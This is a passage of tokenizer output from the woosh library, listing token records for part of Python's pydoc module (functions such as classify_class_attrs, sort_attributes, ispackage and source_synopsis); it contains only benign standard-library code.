woosh.Token(woosh.COMMENT, '# Namedtuples have public fields and methods with a single leading underscore', 284, 4, 284, 81),
woosh.Token(woosh.NAME, 'if', 285, 4, 285, 6),
woosh.Token(woosh.NAME, 'name', 285, 7, 285, 11),
woosh.Token(woosh.OP, '.', 285, 11, 285, 12),
woosh.Token(woosh.NAME, 'startswith', 285, 12, 285, 22),
woosh.Token(woosh.OP, '(', 285, 22, 285, 23),
woosh.Token(woosh.STRING, "'_'", 285, 23, 285, 26),
woosh.Token(woosh.OP, ')', 285, 26, 285, 27),
woosh.Token(woosh.NAME, 'and', 285, 28, 285, 31),
woosh.Token(woosh.NAME, 'hasattr', 285, 32, 285, 39),
woosh.Token(woosh.OP, '(', 285, 39, 285, 40),
woosh.Token(woosh.NAME, 'obj', 285, 40, 285, 43),
woosh.Token(woosh.OP, ',', 285, 43, 285, 44),
woosh.Token(woosh.STRING, "'_fields'", 285, 45, 285, 54),
woosh.Token(woosh.OP, ')', 285, 54, 285, 55),
woosh.Token(woosh.OP, ':', 285, 55, 285, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 285, 56, 286, 0),
woosh.Token(woosh.INDENT, ' ', 286, 0, 286, 8),
woosh.Token(woosh.NAME, 'return', 286, 8, 286, 14),
woosh.Token(woosh.NAME, 'True', 286, 15, 286, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 286, 19, 287, 0),
woosh.Token(woosh.DEDENT, ' ', 287, 0, 287, 4),
woosh.Token(woosh.NAME, 'if', 287, 4, 287, 6),
woosh.Token(woosh.NAME, 'all', 287, 7, 287, 10),
woosh.Token(woosh.NAME, 'is', 287, 11, 287, 13),
woosh.Token(woosh.NAME, 'not', 287, 14, 287, 17),
woosh.Token(woosh.NAME, 'None', 287, 18, 287, 22),
woosh.Token(woosh.OP, ':', 287, 22, 287, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 287, 23, 288, 0),
woosh.Token(woosh.COMMENT, '# only document that which the programmer exported in __all__', 288, 8, 288, 69),
woosh.Token(woosh.INDENT, ' ', 289, 0, 289, 8),
woosh.Token(woosh.NAME, 'return', 289, 8, 289, 14),
woosh.Token(woosh.NAME, 'name', 289, 15, 289, 19),
woosh.Token(woosh.NAME, 'in', 289, 20, 289, 22),
woosh.Token(woosh.NAME, 'all', 289, 23, 289, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 289, 26, 290, 0),
woosh.Token(woosh.DEDENT, ' ', 290, 0, 290, 4),
woosh.Token(woosh.NAME, 'else', 290, 4, 290, 8),
woosh.Token(woosh.OP, ':', 290, 8, 290, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 290, 9, 291, 0),
woosh.Token(woosh.INDENT, ' ', 291, 0, 291, 8),
woosh.Token(woosh.NAME, 'return', 291, 8, 291, 14),
woosh.Token(woosh.NAME, 'not', 291, 15, 291, 18),
woosh.Token(woosh.NAME, 'name', 291, 19, 291, 23),
woosh.Token(woosh.OP, '.', 291, 23, 291, 24),
woosh.Token(woosh.NAME, 'startswith', 291, 24, 291, 34),
woosh.Token(woosh.OP, '(', 291, 34, 291, 35),
woosh.Token(woosh.STRING, "'_'", 291, 35, 291, 38),
woosh.Token(woosh.OP, ')', 291, 38, 291, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 291, 39, 292, 0),
woosh.Token(woosh.DEDENT, '', 293, 0, 293, 0),
woosh.Token(woosh.DEDENT, '', 293, 0, 293, 0),
woosh.Token(woosh.NAME, 'def', 293, 0, 293, 3),
woosh.Token(woosh.NAME, 'classify_class_attrs', 293, 4, 293, 24),
woosh.Token(woosh.OP, '(', 293, 24, 293, 25),
woosh.Token(woosh.NAME, 'object', 293, 25, 293, 31),
woosh.Token(woosh.OP, ')', 293, 31, 293, 32),
woosh.Token(woosh.OP, ':', 293, 32, 293, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 293, 33, 294, 0),
woosh.Token(woosh.INDENT, ' ', 294, 0, 294, 4),
woosh.Token(woosh.STRING, '"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""', 294, 4, 294, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 294, 77, 295, 0),
woosh.Token(woosh.NAME, 'results', 295, 4, 295, 11),
woosh.Token(woosh.OP, '=', 295, 12, 295, 13),
woosh.Token(woosh.OP, '[', 295, 14, 295, 15),
woosh.Token(woosh.OP, ']', 295, 15, 295, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 295, 16, 296, 0),
woosh.Token(woosh.NAME, 'for', 296, 4, 296, 7),
woosh.Token(woosh.OP, '(', 296, 8, 296, 9),
woosh.Token(woosh.NAME, 'name', 296, 9, 296, 13),
woosh.Token(woosh.OP, ',', 296, 13, 296, 14),
woosh.Token(woosh.NAME, 'kind', 296, 15, 296, 19),
woosh.Token(woosh.OP, ',', 296, 19, 296, 20),
woosh.Token(woosh.NAME, 'cls', 296, 21, 296, 24),
woosh.Token(woosh.OP, ',', 296, 24, 296, 25),
woosh.Token(woosh.NAME, 'value', 296, 26, 296, 31),
woosh.Token(woosh.OP, ')', 296, 31, 296, 32),
woosh.Token(woosh.NAME, 'in', 296, 33, 296, 35),
woosh.Token(woosh.NAME, 'inspect', 296, 36, 296, 43),
woosh.Token(woosh.OP, '.', 296, 43, 296, 44),
woosh.Token(woosh.NAME, 'classify_class_attrs', 296, 44, 296, 64),
woosh.Token(woosh.OP, '(', 296, 64, 296, 65),
woosh.Token(woosh.NAME, 'object', 296, 65, 296, 71),
woosh.Token(woosh.OP, ')', 296, 71, 296, 72),
woosh.Token(woosh.OP, ':', 296, 72, 296, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 296, 73, 297, 0),
woosh.Token(woosh.INDENT, ' ', 297, 0, 297, 8),
woosh.Token(woosh.NAME, 'if', 297, 8, 297, 10),
woosh.Token(woosh.NAME, 'inspect', 297, 11, 297, 18),
woosh.Token(woosh.OP, '.', 297, 18, 297, 19),
woosh.Token(woosh.NAME, 'isdatadescriptor', 297, 19, 297, 35),
woosh.Token(woosh.OP, '(', 297, 35, 297, 36),
woosh.Token(woosh.NAME, 'value', 297, 36, 297, 41),
woosh.Token(woosh.OP, ')', 297, 41, 297, 42),
woosh.Token(woosh.OP, ':', 297, 42, 297, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 297, 43, 298, 0),
woosh.Token(woosh.INDENT, ' ', 298, 0, 298, 12),
woosh.Token(woosh.NAME, 'kind', 298, 12, 298, 16),
woosh.Token(woosh.OP, '=', 298, 17, 298, 18),
woosh.Token(woosh.STRING, "'data descriptor'", 298, 19, 298, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 298, 36, 299, 0),
woosh.Token(woosh.NAME, 'if', 299, 12, 299, 14),
woosh.Token(woosh.NAME, 'isinstance', 299, 15, 299, 25),
woosh.Token(woosh.OP, '(', 299, 25, 299, 26),
woosh.Token(woosh.NAME, 'value', 299, 26, 299, 31),
woosh.Token(woosh.OP, ',', 299, 31, 299, 32),
woosh.Token(woosh.NAME, 'property', 299, 33, 299, 41),
woosh.Token(woosh.OP, ')', 299, 41, 299, 42),
woosh.Token(woosh.NAME, 'and', 299, 43, 299, 46),
woosh.Token(woosh.NAME, 'value', 299, 47, 299, 52),
woosh.Token(woosh.OP, '.', 299, 52, 299, 53),
woosh.Token(woosh.NAME, 'fset', 299, 53, 299, 57),
woosh.Token(woosh.NAME, 'is', 299, 58, 299, 60),
woosh.Token(woosh.NAME, 'None', 299, 61, 299, 65),
woosh.Token(woosh.OP, ':', 299, 65, 299, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 299, 66, 300, 0),
woosh.Token(woosh.INDENT, ' ', 300, 0, 300, 16),
woosh.Token(woosh.NAME, 'kind', 300, 16, 300, 20),
woosh.Token(woosh.OP, '=', 300, 21, 300, 22),
woosh.Token(woosh.STRING, "'readonly property'", 300, 23, 300, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 300, 42, 301, 0),
woosh.Token(woosh.DEDENT, ' ', 301, 0, 301, 8),
woosh.Token(woosh.DEDENT, '', 301, 8, 301, 8),
woosh.Token(woosh.NAME, 'results', 301, 8, 301, 15),
woosh.Token(woosh.OP, '.', 301, 15, 301, 16),
woosh.Token(woosh.NAME, 'append', 301, 16, 301, 22),
woosh.Token(woosh.OP, '(', 301, 22, 301, 23),
woosh.Token(woosh.OP, '(', 301, 23, 301, 24),
woosh.Token(woosh.NAME, 'name', 301, 24, 301, 28),
woosh.Token(woosh.OP, ',', 301, 28, 301, 29),
woosh.Token(woosh.NAME, 'kind', 301, 30, 301, 34),
woosh.Token(woosh.OP, ',', 301, 34, 301, 35),
woosh.Token(woosh.NAME, 'cls', 301, 36, 301, 39),
woosh.Token(woosh.OP, ',', 301, 39, 301, 40),
woosh.Token(woosh.NAME, 'value', 301, 41, 301, 46),
woosh.Token(woosh.OP, ')', 301, 46, 301, 47),
woosh.Token(woosh.OP, ')', 301, 47, 301, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 301, 48, 302, 0),
woosh.Token(woosh.DEDENT, ' ', 302, 0, 302, 4),
woosh.Token(woosh.NAME, 'return', 302, 4, 302, 10),
woosh.Token(woosh.NAME, 'results', 302, 11, 302, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 302, 18, 303, 0),
woosh.Token(woosh.DEDENT, '', 304, 0, 304, 0),
woosh.Token(woosh.NAME, 'def', 304, 0, 304, 3),
woosh.Token(woosh.NAME, 'sort_attributes', 304, 4, 304, 19),
woosh.Token(woosh.OP, '(', 304, 19, 304, 20),
woosh.Token(woosh.NAME, 'attrs', 304, 20, 304, 25),
woosh.Token(woosh.OP, ',', 304, 25, 304, 26),
woosh.Token(woosh.NAME, 'object', 304, 27, 304, 33),
woosh.Token(woosh.OP, ')', 304, 33, 304, 34),
woosh.Token(woosh.OP, ':', 304, 34, 304, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 304, 35, 305, 0),
woosh.Token(woosh.INDENT, ' ', 305, 0, 305, 4),
woosh.Token(woosh.STRING, "'Sort the attrs list in-place by _fields and then alphabetically by name'", 305, 4, 305, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 305, 77, 306, 0),
woosh.Token(woosh.COMMENT, '# This allows data descriptors to be ordered according', 306, 4, 306, 58),
woosh.Token(woosh.COMMENT, '# to a _fields attribute if present.', 307, 4, 307, 40),
woosh.Token(woosh.NAME, 'fields', 308, 4, 308, 10),
woosh.Token(woosh.OP, '=', 308, 11, 308, 12),
woosh.Token(woosh.NAME, 'getattr', 308, 13, 308, 20),
woosh.Token(woosh.OP, '(', 308, 20, 308, 21),
woosh.Token(woosh.NAME, 'object', 308, 21, 308, 27),
woosh.Token(woosh.OP, ',', 308, 27, 308, 28),
woosh.Token(woosh.STRING, "'_fields'", 308, 29, 308, 38),
woosh.Token(woosh.OP, ',', 308, 38, 308, 39),
woosh.Token(woosh.OP, '[', 308, 40, 308, 41),
woosh.Token(woosh.OP, ']', 308, 41, 308, 42),
woosh.Token(woosh.OP, ')', 308, 42, 308, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 308, 43, 309, 0),
woosh.Token(woosh.NAME, 'try', 309, 4, 309, 7),
woosh.Token(woosh.OP, ':', 309, 7, 309, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 309, 8, 310, 0),
woosh.Token(woosh.INDENT, ' ', 310, 0, 310, 8),
woosh.Token(woosh.NAME, 'field_order', 310, 8, 310, 19),
woosh.Token(woosh.OP, '=', 310, 20, 310, 21),
woosh.Token(woosh.OP, '{', 310, 22, 310, 23),
woosh.Token(woosh.NAME, 'name', 310, 23, 310, 27),
woosh.Token(woosh.OP, ':', 310, 28, 310, 29),
woosh.Token(woosh.NAME, 'i', 310, 30, 310, 31),
woosh.Token(woosh.OP, '-', 310, 31, 310, 32),
woosh.Token(woosh.NAME, 'len', 310, 32, 310, 35),
woosh.Token(woosh.OP, '(', 310, 35, 310, 36),
woosh.Token(woosh.NAME, 'fields', 310, 36, 310, 42),
woosh.Token(woosh.OP, ')', 310, 42, 310, 43),
woosh.Token(woosh.NAME, 'for', 310, 44, 310, 47),
woosh.Token(woosh.OP, '(', 310, 48, 310, 49),
woosh.Token(woosh.NAME, 'i', 310, 49, 310, 50),
woosh.Token(woosh.OP, ',', 310, 50, 310, 51),
woosh.Token(woosh.NAME, 'name', 310, 52, 310, 56),
woosh.Token(woosh.OP, ')', 310, 56, 310, 57),
woosh.Token(woosh.NAME, 'in', 310, 58, 310, 60),
woosh.Token(woosh.NAME, 'enumerate', 310, 61, 310, 70),
woosh.Token(woosh.OP, '(', 310, 70, 310, 71),
woosh.Token(woosh.NAME, 'fields', 310, 71, 310, 77),
woosh.Token(woosh.OP, ')', 310, 77, 310, 78),
woosh.Token(woosh.OP, '}', 310, 78, 310, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 310, 79, 311, 0),
woosh.Token(woosh.DEDENT, ' ', 311, 0, 311, 4),
woosh.Token(woosh.NAME, 'except', 311, 4, 311, 10),
woosh.Token(woosh.NAME, 'TypeError', 311, 11, 311, 20),
woosh.Token(woosh.OP, ':', 311, 20, 311, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 311, 21, 312, 0),
woosh.Token(woosh.INDENT, ' ', 312, 0, 312, 8),
woosh.Token(woosh.NAME, 'field_order', 312, 8, 312, 19),
woosh.Token(woosh.OP, '=', 312, 20, 312, 21),
woosh.Token(woosh.OP, '{', 312, 22, 312, 23),
woosh.Token(woosh.OP, '}', 312, 23, 312, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 312, 24, 313, 0),
woosh.Token(woosh.DEDENT, ' ', 313, 0, 313, 4),
woosh.Token(woosh.NAME, 'keyfunc', 313, 4, 313, 11),
woosh.Token(woosh.OP, '=', 313, 12, 313, 13),
woosh.Token(woosh.NAME, 'lambda', 313, 14, 313, 20),
woosh.Token(woosh.NAME, 'attr', 313, 21, 313, 25),
woosh.Token(woosh.OP, ':', 313, 25, 313, 26),
woosh.Token(woosh.OP, '(', 313, 27, 313, 28),
woosh.Token(woosh.NAME, 'field_order', 313, 28, 313, 39),
woosh.Token(woosh.OP, '.', 313, 39, 313, 40),
woosh.Token(woosh.NAME, 'get', 313, 40, 313, 43),
woosh.Token(woosh.OP, '(', 313, 43, 313, 44),
woosh.Token(woosh.NAME, 'attr', 313, 44, 313, 48),
woosh.Token(woosh.OP, '[', 313, 48, 313, 49),
woosh.Token(woosh.NUMBER, '0', 313, 49, 313, 50),
woosh.Token(woosh.OP, ']', 313, 50, 313, 51),
woosh.Token(woosh.OP, ',', 313, 51, 313, 52),
woosh.Token(woosh.NUMBER, '0', 313, 53, 313, 54),
woosh.Token(woosh.OP, ')', 313, 54, 313, 55),
woosh.Token(woosh.OP, ',', 313, 55, 313, 56),
woosh.Token(woosh.NAME, 'attr', 313, 57, 313, 61),
woosh.Token(woosh.OP, '[', 313, 61, 313, 62),
woosh.Token(woosh.NUMBER, '0', 313, 62, 313, 63),
woosh.Token(woosh.OP, ']', 313, 63, 313, 64),
woosh.Token(woosh.OP, ')', 313, 64, 313, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 313, 65, 314, 0),
woosh.Token(woosh.NAME, 'attrs', 314, 4, 314, 9),
woosh.Token(woosh.OP, '.', 314, 9, 314, 10),
woosh.Token(woosh.NAME, 'sort', 314, 10, 314, 14),
woosh.Token(woosh.OP, '(', 314, 14, 314, 15),
woosh.Token(woosh.NAME, 'key', 314, 15, 314, 18),
woosh.Token(woosh.OP, '=', 314, 18, 314, 19),
woosh.Token(woosh.NAME, 'keyfunc', 314, 19, 314, 26),
woosh.Token(woosh.OP, ')', 314, 26, 314, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 314, 27, 315, 0),
woosh.Token(woosh.COMMENT, '# ----------------------------------------------------- module manipulation', 316, 0, 316, 75),
woosh.Token(woosh.DEDENT, '', 318, 0, 318, 0),
woosh.Token(woosh.NAME, 'def', 318, 0, 318, 3),
woosh.Token(woosh.NAME, 'ispackage', 318, 4, 318, 13),
woosh.Token(woosh.OP, '(', 318, 13, 318, 14),
woosh.Token(woosh.NAME, 'path', 318, 14, 318, 18),
woosh.Token(woosh.OP, ')', 318, 18, 318, 19),
woosh.Token(woosh.OP, ':', 318, 19, 318, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 318, 20, 319, 0),
woosh.Token(woosh.INDENT, ' ', 319, 0, 319, 4),
woosh.Token(woosh.STRING, '"""Guess whether a path refers to a package directory."""', 319, 4, 319, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 319, 61, 320, 0),
woosh.Token(woosh.NAME, 'if', 320, 4, 320, 6),
woosh.Token(woosh.NAME, 'os', 320, 7, 320, 9),
woosh.Token(woosh.OP, '.', 320, 9, 320, 10),
woosh.Token(woosh.NAME, 'path', 320, 10, 320, 14),
woosh.Token(woosh.OP, '.', 320, 14, 320, 15),
woosh.Token(woosh.NAME, 'isdir', 320, 15, 320, 20),
woosh.Token(woosh.OP, '(', 320, 20, 320, 21),
woosh.Token(woosh.NAME, 'path', 320, 21, 320, 25),
woosh.Token(woosh.OP, ')', 320, 25, 320, 26),
woosh.Token(woosh.OP, ':', 320, 26, 320, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 320, 27, 321, 0),
woosh.Token(woosh.INDENT, ' ', 321, 0, 321, 8),
woosh.Token(woosh.NAME, 'for', 321, 8, 321, 11),
woosh.Token(woosh.NAME, 'ext', 321, 12, 321, 15),
woosh.Token(woosh.NAME, 'in', 321, 16, 321, 18),
woosh.Token(woosh.OP, '(', 321, 19, 321, 20),
woosh.Token(woosh.STRING, "'.py'", 321, 20, 321, 25),
woosh.Token(woosh.OP, ',', 321, 25, 321, 26),
woosh.Token(woosh.STRING, "'.pyc'", 321, 27, 321, 33),
woosh.Token(woosh.OP, ')', 321, 33, 321, 34),
woosh.Token(woosh.OP, ':', 321, 34, 321, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 321, 35, 322, 0),
woosh.Token(woosh.INDENT, ' ', 322, 0, 322, 12),
woosh.Token(woosh.NAME, 'if', 322, 12, 322, 14),
woosh.Token(woosh.NAME, 'os', 322, 15, 322, 17),
woosh.Token(woosh.OP, '.', 322, 17, 322, 18),
woosh.Token(woosh.NAME, 'path', 322, 18, 322, 22),
woosh.Token(woosh.OP, '.', 322, 22, 322, 23),
woosh.Token(woosh.NAME, 'isfile', 322, 23, 322, 29),
woosh.Token(woosh.OP, '(', 322, 29, 322, 30),
woosh.Token(woosh.NAME, 'os', 322, 30, 322, 32),
woosh.Token(woosh.OP, '.', 322, 32, 322, 33),
woosh.Token(woosh.NAME, 'path', 322, 33, 322, 37),
woosh.Token(woosh.OP, '.', 322, 37, 322, 38),
woosh.Token(woosh.NAME, 'join', 322, 38, 322, 42),
woosh.Token(woosh.OP, '(', 322, 42, 322, 43),
woosh.Token(woosh.NAME, 'path', 322, 43, 322, 47),
woosh.Token(woosh.OP, ',', 322, 47, 322, 48),
woosh.Token(woosh.STRING, "'__init__'", 322, 49, 322, 59),
woosh.Token(woosh.OP, '+', 322, 60, 322, 61),
woosh.Token(woosh.NAME, 'ext', 322, 62, 322, 65),
woosh.Token(woosh.OP, ')', 322, 65, 322, 66),
woosh.Token(woosh.OP, ')', 322, 66, 322, 67),
woosh.Token(woosh.OP, ':', 322, 67, 322, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 322, 68, 323, 0),
woosh.Token(woosh.INDENT, ' ', 323, 0, 323, 16),
woosh.Token(woosh.NAME, 'return', 323, 16, 323, 22),
woosh.Token(woosh.NAME, 'True', 323, 23, 323, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 323, 27, 324, 0),
woosh.Token(woosh.DEDENT, ' ', 324, 0, 324, 4),
woosh.Token(woosh.DEDENT, '', 324, 4, 324, 4),
woosh.Token(woosh.DEDENT, '', 324, 4, 324, 4),
woosh.Token(woosh.NAME, 'return', 324, 4, 324, 10),
woosh.Token(woosh.NAME, 'False', 324, 11, 324, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 324, 16, 325, 0),
woosh.Token(woosh.DEDENT, '', 326, 0, 326, 0),
woosh.Token(woosh.NAME, 'def', 326, 0, 326, 3),
woosh.Token(woosh.NAME, 'source_synopsis', 326, 4, 326, 19),
woosh.Token(woosh.OP, '(', 326, 19, 326, 20),
woosh.Token(woosh.NAME, 'file', 326, 20, 326, 24),
woosh.Token(woosh.OP, ')', 326, 24, 326, 25),
woosh.Token(woosh.OP, ':', 326, 25, 326, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 326, 26, 327, 0),
woosh.Token(woosh.INDENT, ' ', 327, 0, 327, 4),
woosh.Token(woosh.NAME, 'line', 327, 4, 327, 8),
woosh.Token(woosh.OP, '=', 327, 9, 327, 10),
woosh.Token(woosh.NAME, 'file', 327, 11, 327, 15),
woosh.Token(woosh.OP, '.', 327, 15, 327, 16),
woosh.Token(woosh.NAME, 'readline', 327, 16, 327, 24),
woosh.Token(woosh.OP, '(', 327, 24, 327, 25),
woosh.Token(woosh.OP, ')', 327, 25, 327, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 327, 26, 328, 0),
woosh.Token(woosh.NAME, 'while', 328, 4, 328, 9),
woosh.Token(woosh.NAME, 'line', 328, 10, 328, 14),
woosh.Token(woosh.OP, '[', 328, 14, 328, 15),
woosh.Token(woosh.OP, ':', 328, 15, 328, 16),
woosh.Token(woosh.NUMBER, '1', 328, 16, 328, 17),
woosh.Token(woosh.OP, ']', 328, 17, 328, 18),
woosh.Token(woosh.OP, '==', 328, 19, 328, 21),
woosh.Token(woosh.STRING, "'#'", 328, 22, 328, 25),
woosh.Token(woosh.NAME, 'or', 328, 26, 328, 28),
woosh.Token(woosh.NAME, 'not', 328, 29, 328, 32),
woosh.Token(woosh.NAME, 'line', 328, 33, 328, 37),
woosh.Token(woosh.OP, '.', 328, 37, 328, 38),
woosh.Token(woosh.NAME, 'strip', 328, 38, 328, 43),
woosh.Token(woosh.OP, '(', 328, 43, 328, 44),
woosh.Token(woosh.OP, ')', 328, 44, 328, 45),
woosh.Token(woosh.OP, ':', 328, 45, 328, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 328, 46, 329, 0),
woosh.Token(woosh.INDENT, ' ', 329, 0, 329, 8),
woosh.Token(woosh.NAME, 'line', 329, 8, 329, 12),
woosh.Token(woosh.OP, '=', 329, 13, 329, 14),
woosh.Token(woosh.NAME, 'file', 329, 15, 329, 19),
woosh.Token(woosh.OP, '.', 329, 19, 329, 20),
woosh.Token(woosh.NAME, 'readline', 329, 20, 329, 28),
woosh.Token(woosh.OP, '(', 329, 28, 329, 29),
woosh.Token(woosh.OP, ')', 329, 29, 329, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 329, 30, 330, 0),
woosh.Token(woosh.NAME, 'if', 330, 8, 330, 10),
woosh.Token(woosh.NAME, 'not', 330, 11, 330, 14),
woosh.Token(woosh.NAME, 'line', 330, 15, 330, 19),
woosh.Token(woosh.OP, ':', 330, 19, 330, 20),
woosh.Token(woosh.NAME, 'break', 330, 21, 330, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 330, 26, 331, 0),
woosh.Token(woosh.DEDENT, ' ', 331, 0, 331, 4),
woosh.Token(woosh.NAME, 'line', 331, 4, 331, 8),
woosh.Token(woosh.OP, '=', 331, 9, 331, 10),
woosh.Token(woosh.NAME, 'line', 331, 11, 331, 15),
woosh.Token(woosh.OP, '.', 331, 15, 331, 16),
woosh.Token(woosh.NAME, 'strip', 331, 16, 331, 21),
woosh.Token(woosh.OP, '(', 331, 21, 331, 22),
woosh.Token(woosh.OP, ')', 331, 22, 331, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 331, 23, 332, 0),
woosh.Token(woosh.NAME, 'if', 332, 4, 332, 6),
woosh.Token(woosh.NAME, 'line', 332, 7, 332, 11),
woosh.Token(woosh.OP, '[', 332, 11, 332, 12),
woosh.Token(woosh.OP, ':', 332, 12, 332, 13),
woosh.Token(woosh.NUMBER, '4', 332, 13, 332, 14),
woosh.Token(woosh.OP, ']', 332, 14, 332, 15),
woosh.Token(woosh.OP, '==', 332, 16, 332, 18),
woosh.Token(woosh.STRING, '\'r"""\'', 332, 19, 332, 25),
woosh.Token(woosh.OP, ':', 332, 25, 332, 26),
woosh.Token(woosh.NAME, 'line', 332, 27, 332, 31),
woosh.Token(woosh.OP, '=', 332, 32, 332, 33),
woosh.Token(woosh.NAME, 'line', 332, 34, 332, 38),
woosh.Token(woosh.OP, '[', 332, 38, 332, 39),
woosh.Token(woosh.NUMBER, '1', 332, 39, 332, 40),
woosh.Token(woosh.OP, ':', 332, 40, 332, 41),
woosh.Token(woosh.OP, ']', 332, 41, 332, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 332, 42, 333, 0),
woosh.Token(woosh.NAME, 'if', 333, 4, 333, 6),
woosh.Token(woosh.NAME, 'line', 333, 7, 333, 11),
woosh.Token(woosh.OP, '[', 333, 11, 333, 12),
woosh.Token(woosh.OP, ':', 333, 12, 333, 13),
woosh.Token(woosh.NUMBER, '3', 333, 13, 333, 14),
woosh.Token(woosh.OP, ']', 333, 14, 333, 15),
woosh.Token(woosh.OP, '==', 333, 16, 333, 18),
woosh.Token(woosh.STRING, '\'"""\'', 333, 19, 333, 24),
woosh.Token(woosh.OP, ':', 333, 24, 333, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 333, 25, 334, 0),
woosh.Token(woosh.INDENT, ' ', 334, 0, 334, 8),
woosh.Token(woosh.NAME, 'line', 334, 8, 334, 12),
woosh.Token(woosh.OP, '=', 334, 13, 334, 14),
woosh.Token(woosh.NAME, 'line', 334, 15, 334, 19),
woosh.Token(woosh.OP, '[', 334, 19, 334, 20),
woosh.Token(woosh.NUMBER, '3', 334, 20, 334, 21),
woosh.Token(woosh.OP, ':', 334, 21, 334, 22),
woosh.Token(woosh.OP, ']', 334, 22, 334, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 334, 23, 335, 0),
woosh.Token(woosh.NAME, 'if', 335, 8, 335, 10),
woosh.Token(woosh.NAME, 'line', 335, 11, 335, 15),
woosh.Token(woosh.OP, '[', 335, 15, 335, 16),
woosh.Token(woosh.OP, '-', 335, 16, 335, 17),
woosh.Token(woosh.NUMBER, '1', 335, 17, 335, 18),
woosh.Token(woosh.OP, ':', 335, 18, 335, 19),
woosh.Token(woosh.OP, ']', 335, 19, 335, 20),
woosh.Token(woosh.OP, '==', 335, 21, 335, 23),
woosh.Token(woosh.STRING, "'\\\\'", 335, 24, 335, 28),
woosh.Token(woosh.OP, ':', 335, 28, 335, 29),
woosh.Token(woosh.NAME, 'line', 335, 30, 335, 34),
woosh.Token(woosh.OP, '=', 335, 35, 335, 36),
woosh.Token(woosh.NAME, 'line', 335, 37, 335, 41),
woosh.Token(woosh.OP, '[', 335, 41, 335, 42),
woosh.Token(woosh.OP, ':', 335, 42, 335, 43),
woosh.Token(woosh.OP, '-', 335, 43, 335, 44),
woosh.Token(woosh.NUMBER, '1', 335, 44, 335, 45),
woosh.Token(woosh.OP, ']', 335, 45, 335, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 335, 46, 336, 0),
woosh.Token(woosh.NAME, 'while', 336, 8, 336, 13),
woosh.Token(woosh.NAME, 'not', 336, 14, 336, 17),
woosh.Token(woosh.NAME, 'line', 336, 18, 336, 22),
woosh.Token(woosh.OP, '.', 336, 22, 336, 23),
woosh.Token(woosh.NAME, 'strip', 336, 23, 336, 28),
woosh.Token(woosh.OP, '(', 336, 28, 336, 29),
woosh.Token(woosh.OP, ')', 336, 29, 336, 30),
woosh.Token(woosh.OP, ':', 336, 30, 336, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 336, 31, 337, 0),
woosh.Token(woosh.INDENT, ' ', 337, 0, 337, 12),
woosh.Token(woosh.NAME, 'line', 337, 12, 337, 16),
woosh.Token(woosh.OP, '=', 337, 17, 337, 18),
woosh.Token(woosh.NAME, 'file', 337, 19, 337, 23),
woosh.Token(woosh.OP, '.', 337, 23, 337, 24),
woosh.Token(woosh.NAME, 'readline', 337, 24, 337, 32),
woosh.Token(woosh.OP, '(', 337, 32, 337, 33),
woosh.Token(woosh.OP, ')', 337, 33, 337, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 337, 34, 338, 0),
woosh.Token(woosh.NAME, 'if', 338, 12, 338, 14),
woosh.Token(woosh.NAME, 'not', 338, 15, 338, 18),
woosh.Token(woosh.NAME, 'line', 338, 19, 338, 23),
woosh.Token(woosh.OP, ':', 338, 23, 338, 24),
woosh.Token(woosh.NAME, 'break', 338, 25, 338, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 338, 30, 339, 0),
woosh.Token(woosh.DEDENT, ' ', 339, 0, 339, 8),
woosh.Token(woosh.NAME, 'result', 339, 8, 339, 14),
woosh.Token(woosh.OP, '=', 339, 15, 339, 16),
woosh.Token(woosh.NAME, 'line', 339, 17, 339, 21),
woosh.Token(woosh.OP, '.', 339, 21, 339, 22),
woosh.Token(woosh.NAME, 'split', 339, 22, 339, 27),
woosh.Token(woosh.OP, '(', 339, 27, 339, 28),
woosh.Token(woosh.STRING, '\'"""\'', 339, 28, 339, 33),
woosh.Token(woosh.OP, ')', 339, 33, 339, 34),
woosh.Token(woosh.OP, '[', 339, 34, 339, 35),
woosh.Token(woosh.NUMBER, '0', 339, 35, 339, 36),
woosh.Token(woosh.OP, ']', 339, 36, 339, 37),
woosh.Token(woosh.OP, '.', 339, 37, 339, 38),
woosh.Token(woosh.NAME, 'strip', 339, 38, 339, 43),
woosh.Token(woosh.OP, '(', 339, 43, 339, 44),
woosh.Token(woosh.OP, ')', 339, 44, 339, 45),
